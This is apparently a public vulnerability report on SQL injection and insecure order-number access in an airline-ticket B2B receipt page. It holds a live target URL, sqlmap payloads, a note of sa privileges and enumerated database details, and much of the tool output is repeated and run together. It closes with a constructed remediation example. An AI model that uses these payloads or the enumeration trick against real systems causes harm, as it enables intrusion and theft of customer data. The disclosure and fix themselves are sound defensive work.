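2015-06-30: Details reported to the vendor; awaiting vendor response
2015-07-03: Vendor confirmed; details disclosed to the vendor only
2015-07-13: Details disclosed to core white hats and experts in related fields
2015-07-23: Details disclosed to regular white hats
2015-08-02: Details disclosed to intern white hats
2015-08-17: Details disclosed to the public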
Airline tickets are such a hot topic that I wanted to join in the fun too.
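Injection point: http://b2b.89898989.com/reports/printreceipt.aspx?orderno=406032011601
sa privileges. Writing a shell failed. SQL commands can be executed; writing a shell that way also failed.
Unauthorized access: http://b2b.89898989.com/reports/printreceipt.aspx?orderno=406032011601
The orderno parameter is controllable; generate a numeric dictionary, run through it, and that's it.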
sqlmap identified the following injection points with a total of 44 HTTP(s) requests:
---
Place: GET
Parameter: orderno
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: orderno=406032011601' AND 2984=2984 AND 'whMu'='whMu

    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: orderno=406032011601' AND 1880=CONVERT(INT,(CHAR(58) CHAR(99) CHAR(113) CHAR(102) CHAR(58) (SELECT (CASE WHEN (1880=1880) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(58) CHAR(103) CHAR(114) CHAR(120) CHAR(58))) AND 'UfkW'='UfkW

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query)
    Payload: orderno=406032011601' AND 7100=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND 'sNNo'='sNNo
---
web server operating system: Windows 2008
web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008

available databases [10]:
[*] distribution
[*] master
[*] model
[*] msdb
[*] tempdb
[*] YeeSoHo_4.0
[*] YeeSoHo_History
[*] YeeSoHo_History2014
[*] YeeSoHo_Log
[*] YeeSoHo_Log_2015

current database: 'YeeSoHo_4.0'

Database: YeeSoHo_4.0
[629 tables]

database management system users [6]:
[*] ##MS_PolicyEventProcessingLogin##
[*] ##MS_PolicyTsqlExecutionLogin##
[*] ReplicationYeesoho
[*] sa
[*] yeesoho

current user: 'sa'

Database: YeeSoHo_4.0
Table: V_User
[22 columns]

Database: YeeSoHo_4.0
+------------+---------+
| Table      | Entries |
+------------+---------+
| dbo.V_User | 1318    |
+------------+---------+

Database: YeeSoHo_4.0
Table: V4_Ysta_SubsOrderNo
[70 columns]
orderno=406032011601' AND 2984=2984 AND 'whMu'='whMu Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: orderno=406032011601' AND 1880=CONVERT(INT,(CHAR(58) CHAR(99) CHAR(113) CHAR(102) CHAR(58) (SELECT (CASE WHEN (1880=1880) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(58) CHAR(103) CHAR(114) CHAR(120) CHAR(58))) AND 'UfkW'='UfkW Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query) Payload: orderno=406032011601' AND 7100=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND 'sNNo'='sNNo---web server operating system: Windows 2008web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727back-end DBMS: Microsoft SQL Server 2008current user: 'sa'sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: orderno Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: orderno=406032011601' AND 2984=2984 AND 'whMu'='whMu Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: orderno=406032011601' AND 1880=CONVERT(INT,(CHAR(58) CHAR(99) CHAR(113) CHAR(102) CHAR(58) (SELECT (CASE WHEN (1880=1880) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(58) CHAR(103) CHAR(114) CHAR(120) CHAR(58))) AND 'UfkW'='UfkW Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query) Payload: orderno=406032011601' AND 7100=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND 'sNNo'='sNNo---web server operating system: Windows 2008web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727back-end DBMS: Microsoft SQL Server 2008sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: 
GETParameter: orderno Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: orderno=406032011601' AND 2984=2984 AND 'whMu'='whMu Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: orderno=406032011601' AND 1880=CONVERT(INT,(CHAR(58) CHAR(99) CHAR(113) CHAR(102) CHAR(58) (SELECT (CASE WHEN (1880=1880) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(58) CHAR(103) CHAR(114) CHAR(120) CHAR(58))) AND 'UfkW'='UfkW Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query) Payload: orderno=406032011601' AND 7100=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND 'sNNo'='sNNo---web server operating system: Windows 2008web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727back-end DBMS: Microsoft SQL Server 2008database management system users privileges:[*] ##MS_PolicyEventProcessingLogin##[*] ##MS_PolicyTsqlExecutionLogin##[*] distributor_admin (administrator)[*] ReplicationYeesoho[*] sa (administrator)[*] yeesoho (administrator)sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: orderno Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: orderno=406032011601' AND 2984=2984 AND 'whMu'='whMu Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: orderno=406032011601' AND 1880=CONVERT(INT,(CHAR(58) CHAR(99) CHAR(113) CHAR(102) CHAR(58) (SELECT (CASE WHEN (1880=1880) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(58) CHAR(103) CHAR(114) CHAR(120) CHAR(58))) AND 'UfkW'='UfkW Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query) Payload: orderno=406032011601' AND 7100=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS 
sys5,sysusers AS sys6,sysusers AS sys7) AND 'sNNo'='sNNo---web server operating system: Windows 2008web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727back-end DBMS: Microsoft SQL Server 2008SELECT COUNT(*) FROM Change_SubsOrderNo_BK : '1'SELECT COUNT(*) FROM [1]:SELECT COUNT(*) FROM YeeSoHo_4.0 [1]:sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: orderno Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: orderno=406032011601' AND 2984=2984 AND 'whMu'='whMu Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: orderno=406032011601' AND 1880=CONVERT(INT,(CHAR(58) CHAR(99) CHAR(113) CHAR(102) CHAR(58) (SELECT (CASE WHEN (1880=1880) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(58) CHAR(103) CHAR(114) CHAR(120) CHAR(58))) AND 'UfkW'='UfkW Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query) Payload: orderno=406032011601' AND 7100=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND 'sNNo'='sNNo---web server operating system: Windows 2008web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727back-end DBMS: Microsoft SQL Server 2008sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: orderno Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: orderno=406032011601' AND 2984=2984 AND 'whMu'='whMu Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: orderno=406032011601' AND 1880=CONVERT(INT,(CHAR(58) CHAR(99) CHAR(113) CHAR(102) CHAR(58) (SELECT (CASE WHEN (1880=1880) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(58) CHAR(103) CHAR(114) CHAR(120) CHAR(58))) AND 'UfkW'='UfkW Type: AND/OR time-based blind Title: Microsoft 
SQL Server/Sybase AND time-based blind (heavy query) Payload: orderno=406032011601' AND 7100=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND 'sNNo'='sNNo---web server operating system: Windows 2008web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727back-end DBMS: Microsoft SQL Server 2008SELECT COUNT(*) FROM Change_SubsOrderNo_BK : '1'SELECT COUNT(*) FROM V4_YW_RefundAirOrders_OrderNo: '270414'sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
Filter input characters properly, and add an authorization check.
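The recommended fix for the `orderno` parameter, shown as an added example that is not code from the affected application: the concatenated query with no access check beside a version that requires a session, validates the format, binds parameters and scopes the lookup to the order's owner. Python's sqlite3 stands in for the ASP.NET page and SQL Server; the table `orders`, the function names, the session value and the sample rows are assumptions constructed for illustration.

```python
import re
import sqlite3

# Assumed format: digits only, like the order number shown on the page.
ORDER_NO = re.compile(r"[0-9]{6,20}")


def make_db():
    """Constructed sample data: two orders owned by two different customers."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE orders (OrderNo TEXT PRIMARY KEY, CustomerNo TEXT, PsrName TEXT)")
    db.executemany(
        "INSERT INTO orders VALUES (?, ?, ?)",
        [("406032011601", "C001", "Passenger A"),
         ("406032011602", "C002", "Passenger B")],
    )
    return db


def receipt_vulnerable(db, orderno):
    """Before: orderno is concatenated into the SQL text and no caller check exists."""
    sql = "SELECT OrderNo, PsrName FROM orders WHERE OrderNo = '" + orderno + "'"
    return db.execute(sql).fetchall()


def receipt_hardened(db, session_customer, orderno):
    """After: require a session, validate the format, bind parameters, scope to the owner."""
    if session_customer is None:
        raise PermissionError("login required")
    if not ORDER_NO.fullmatch(orderno):
        raise ValueError("malformed order number")
    sql = "SELECT OrderNo, PsrName FROM orders WHERE OrderNo = ? AND CustomerNo = ?"
    return db.execute(sql, (orderno, session_customer)).fetchall()


if __name__ == "__main__":
    db = make_db()
    probe = "406032011601' AND 2984=2984 AND 'whMu'='whMu"  # boolean payload quoted on the page
    print("vulnerable, payload:", receipt_vulnerable(db, probe))
    print("vulnerable, other customer's order:", receipt_vulnerable(db, "406032011602"))
    print("hardened, own order:", receipt_hardened(db, "C001", "406032011601"))
    print("hardened, other customer's order:", receipt_hardened(db, "C001", "406032011602"))
    try:
        receipt_hardened(db, "C001", probe)
    except ValueError as exc:
        print("hardened, payload rejected:", exc)
```

Parameter binding is what keeps the value out of the SQL grammar; the format check only narrows what reaches the query, and the `CustomerNo` predicate is what stops one customer from reading another's receipt by guessing order numbers.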
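Severity: High
Vulnerability Rank: 10
Confirmation time: 2015-07-03 15:07
CNVD has confirmed the reported issue and forwarded it through CNCERT to the Sichuan sub-center, which will coordinate follow-up handling with the organization that administers the website.
None yet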